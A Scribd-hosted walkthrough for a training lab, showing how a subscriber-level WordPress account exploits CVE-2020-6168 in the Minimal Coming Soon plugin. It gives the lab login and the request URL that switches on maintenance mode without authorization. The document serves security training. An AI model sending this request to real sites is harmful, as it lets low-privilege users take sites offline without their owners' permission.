Scribd
Upload
5 views7 pages

WP Minimal Coming Soon Missing Authorization

The document outlines the steps to exploit the CVE-2020-6168 vulnerability in a web application. It provides a reference for commands needed to complete the exercise, including authentication details and specific URLs to navigate. The document emphasizes that it is not a comprehensive guide but rather a reference for further research.

Uploaded by

slashnata07
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5 views7 pages

WP Minimal Coming Soon Missing Authorization

The document outlines the steps to exploit the CVE-2020-6168 vulnerability in a web application. It provides a reference for commands needed to complete the exercise, including authentication details and specific URLs to navigate. The document emphasizes that it is not a comprehensive guide but rather a reference for further research.

Uploaded by

slashnata07
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Name CVE-2020-6168

URL https://attackdefense.com/challengedetails?cid=1935

Type Webapp CVEs: 2020

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

The web application is vulnerable to CVE-2020-6168

Step 1: ​Inspect the web application.


Step 2: ​Search on google “CVE-2020-6168 wpvulndb”.
The link contains the steps to be followed to exploit the vulnerability.

Link: ​https://wpvulndb.com/vulnerabilities/10008

Step 3: ​The user has to authenticate in order to exploit the vulnerability. The login credentials
are provided in the challenge description.

Credentials:
● Username: ​attacker
● Password:​ ​password1

URL: ​http://vyaw9gz6ikb2bjhhefc44kbep.stager3.attackdefenselabs.com/wp-login.php

Login Panel:
Subscriber Dashboard:

Step 4:​ Navigate to the vulnerable URL provided at the exploit URL.
URL:
vyaw9gz6ikb2bjhhefc44kbep.stager3.attackdefenselabs.com/wp-admin/admin.php?action=csm
m_change_status&new_status=enabled&redirect=/wp-admin/

No change would be seen at this point.

Step 5: ​Log out from the panel.


Navigate to the homepage of the website.

The maintenance mode was activated from a subscriber level account.

References:

1. WordPress (​https://wordpress.org/​)
2. Minimal Coming Soon & Maintenance Mode Plugin
(​https://wordpress.org/plugins/minimal-coming-soon-maintenance-mode/​)
3. CVE-2020-6168 (​https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6168​)
4. Minimal Coming Soon & Maintenance Mode < 2.15 - Insecure Permissions: Enable and
Disable Maintenance Mode (​https://wpvulndb.com/vulnerabilities/10008​)

You might also like